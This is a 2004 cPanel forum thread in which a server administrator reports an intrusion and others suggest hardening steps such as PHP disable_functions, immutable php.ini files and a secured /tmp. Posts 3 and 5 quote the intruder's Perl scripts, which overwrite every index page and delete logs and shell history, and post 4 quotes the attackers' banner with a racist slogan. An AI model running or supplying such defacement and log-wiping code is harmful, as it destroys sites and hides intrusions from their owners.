The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Server hacked by little piss-ants

Discussion in 'General Discussion' started by bmcpanel, Apr 15, 2004.

  1. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Just wanted to let everyone know that one of my Cpanel servers has been hacked. I have not had a successful hack in over a year. I keep everything udpated. Wish I knew what the hell happened.

    The intruder was an amateur. They were very noisy. They removed the entire /usr/local/apache/logs folder which caused httpd to be unable to restart which alerted me that there was a problem. What a dip-shit this guy was.

    Anyway, I am restoring os. have previous backups. no problem, just inconvenient.

    I am sensing an increase in hacks, though, of Cpanel servers according to posts on this forum. Does anyone else sense an increase?
     
  2. beebware

    beebware Active Member

    Joined:
    Aug 2, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    I've not really seen an increase of substantiated hack reports (i.e. servers secured by "people who at least have a clue what they are doing": of course, the number of servers 'hacked' that weren't anywhere near secured in the first place stays high...) - but how did they get into your server?
     
  3. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    I have firewall, latest software patches (always), latest Cpanel update, per IP login for SSH for trusted users only (about a half dozen people), etc., etc., etc.

    I don't know how they got in since they comletely removed the log files (friggin amateurs).

    They defaced all index pages on the server. Here is the script they used.

    -------
    #!/usr/local/perl/bin
    system("find / index.* >> caxe.txt");
    system("find / home.* >> caxe.txt");
    system("find / default.* >> caxe.txt");
    my @dir;
    open(caxe,"<caxe.txt");
    while(<caxe>)
    {
    $dir[$a] = $_;
    chomp $dir[$a];
    $a++;
    $b++;
    }
    for($a=0;$a<=$b;$a++)
    {
    $texto = 'SpyKids 2004';
    system("echo $texto > $dir[$a]");
    }
     
  4. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Cancer v0.01 For Unix |
    | |
    | - System By R0NiN - |
    | - Coded By Malloc - |
    | |
    | PsychoPhobia n` Aneurism Crew |
    | |
    | * White Pride *
     
  5. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    system("rm -fr /root/.bash* 2> /dev/null");
    system("rm -fr /var/log/messages 2> /dev/null");
    system("rm -fr /var/log/secure 2> /dev/null");
    system("rm -fr /var/log/lastlog 2> /dev/null");
    system("rm -fr /var/log/wtmp 2> /dev/null");
    system("rm -fr /var/log/httpd/access_log 2> /dev/null");
    system("rm -fr /var/log/httpd/error_log 2> /dev/null");
    system("rm -rf /var/adm 2> /dev/null");
    system("rm -rf /usr/local/apache/logs 2> /dev/null");
    system("rm -rf /var/log/mysql 2> /dev/null");
    print "\nLogs apagados\n";
    open(arquivo,">caxe");
    print arquivo "";
    close(arquivo);
    open(arquivo,">caxe1");
    print arquivo "";
    close(arquivo);
     
  6. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    bmcpanel, can you provide information on the following:

    - is tmp its own partition and what method was used to secure it

    - do you run PHP in safe_mode

    - have you disabled PHP open_basedir

    Most all cracks I have seen involved insecure PHP scripts and/or settings, although, this one seems to have been through Perl.
     
  7. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Still..that alone doesn't give you root access. To be able to delete all those files they must have become root.

    bmcpanel, you were running the latest kernel I assume?
     
  8. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    small suggestion:

    In Firewall:

    # Common ingress (inbound) TCP ports
    IG_TCP_CPORTS="21,22,25,26,37,53,80,110,143,443,465,1040,2082,2083,2086,2087,2095,2096,3050,3306"

    #
    # Common ingress (inbound) UDP ports
    IG_UDP_CPORTS="37,53,873"


    In WHM:

    - Click in the option 'Background Process Killer' and mark ALL the users:
    - Click in the option 'Allow cPanel users to reset their password via email' - incapacitate


    In Shell:

    1) Protect Php Scripts

    pico -w /etc/php.ini
    pico -w /usr/lib/php.ini
    pico -w /usr/local/lib/php.ini
    pico -w /usr/local/cpanel/3rdparty/etc/php.ini
    pico -w /usr/local/cpanel/3rdparty/lib/php.ini

    Search for line: 'disable_functions' alter for: 'disable_functions = shell_exec, shell_exec, system'


    2) Protect php.ini

    chattr +i /etc/php.ini
    chattr +i /usr/lib/php.ini
    chattr +i /usr/local/lib/php.ini
    chattr +i /usr/local/cpanel/3rdparty/etc/php.ini
    chattr +i /usr/local/cpanel/3rdparty/lib/php.ini


    3) Disable Telnet

    pico -w /etc/xinetd.d/telnet

    alter line 'disable = no' for 'disable = yes'

    /etc/init.d/xinetd restart


    4) Secure TMP

    /scripts/securetmp


    See topic: http://forum.rackshack.net/showthread.php?threadid=30333&highlight=secure+your+box


    Hug
     
  9. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    Hi,

    Doing this

    1) Protect Php Scripts

    pico -w /etc/php.ini
    pico -w /usr/lib/php.ini
    pico -w /usr/local/lib/php.ini
    pico -w /usr/local/cpanel/3rdparty/etc/php.ini
    pico -w /usr/local/cpanel/3rdparty/lib/php.ini

    Search for line: 'disable_functions' alter for: 'disable_functions = shell_exec, shell_exec, system'


    2) Protect php.ini

    chattr +i /etc/php.ini
    chattr +i /usr/lib/php.ini
    chattr +i /usr/local/lib/php.ini
    chattr +i /usr/local/cpanel/3rdparty/etc/php.ini
    chattr +i /usr/local/cpanel/3rdparty/lib/php.ini



    Won't cause any other problem with users scripts?, Please let me know.
     
  10. LS_Drew

    LS_Drew Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    187
    Likes Received:
    0
    Trophy Points:
    16
    If it does, then the user was doing something they shouldn't have been able to do in the first place.
     
  11. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Hello

    This procedure impedes shell functions through php that healthy very dangerous, an user with a simple bug in PHPNUKE can attack your server, and through a directory of open includes in Oscommerce the ' hacker' can rob the whole database and others ...

    Usually only scripts that use shell functions, highly inadvisable they would be prejudiced, I/you had been these any other problem.

    I have 17 servers, an average of 12mil domains and none of them felt prejudiced.
     
  12. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    I can't put a finger on it, but I am thinking this crack came through a PHP script.... probably a forum. Can't prove it, but I suspect it.
     
  13. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Yes
     
  14. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Secure your TMP

    /scripts/securetmp

    Easy !!!!!
     
  15. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    I doubt that would have stopped them anyway. It's very easy to still execute programs in a 'noexec' tmp directory.

    I am curious how they got root though if everything including kernel was up to date. New exploit?
     
  16. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Probably
     
  17. ElrondBCN

    ElrondBCN Active Member

    Joined:
    May 19, 2003
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Boston, MA USA
    Mine was hacked yesterday as well. A new index.html file was placed in the public_html directory of the main account on the server. Since the old index file was index.php, it made our homepage change to something by TechTeam.

    I am still not sure as to how they got in to do this. Latest kernel and all CPanel updates. This was our first hack in 18 months. My best guess is something with PHP as well. I disabled those functions and ran /scripts/securetmp but I'm not sure if that's how they got in.

    Any clues as to how I can go about tracking down how this file was placed into that directory? Moreover, how can I tell if my MySQL db information was stolen or other website files?
     
  18. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    What OS and what kernel exactly are you running ?
    Did you compile apache with PHPsuexec?

    You could grep the domain logs for commands like wget, maybe this will help you find the exploitable script.


    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
     
    #18 jamesbond, Apr 23, 2004
    Last edited: Apr 23, 2004
  19. BeerUser

    BeerUser Active Member

    Joined:
    Apr 16, 2004
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Re: hi

    My php.ini is /usr/local/lib/php.ini
    i did pico -w /usr/local/lib/php.ini
    and in in the shell_exec, shell_exec, system
    one thing is doesnt whm/cpanel use these functions?
     
  20. phpman

    phpman Well-Known Member

    Joined:
    Sep 3, 2003
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Rio de Janeiro - Brazil
    Cpanel and WHM don't use these functions, usually any legitimate application and it holds it uses.
     
Loading...

Share This Page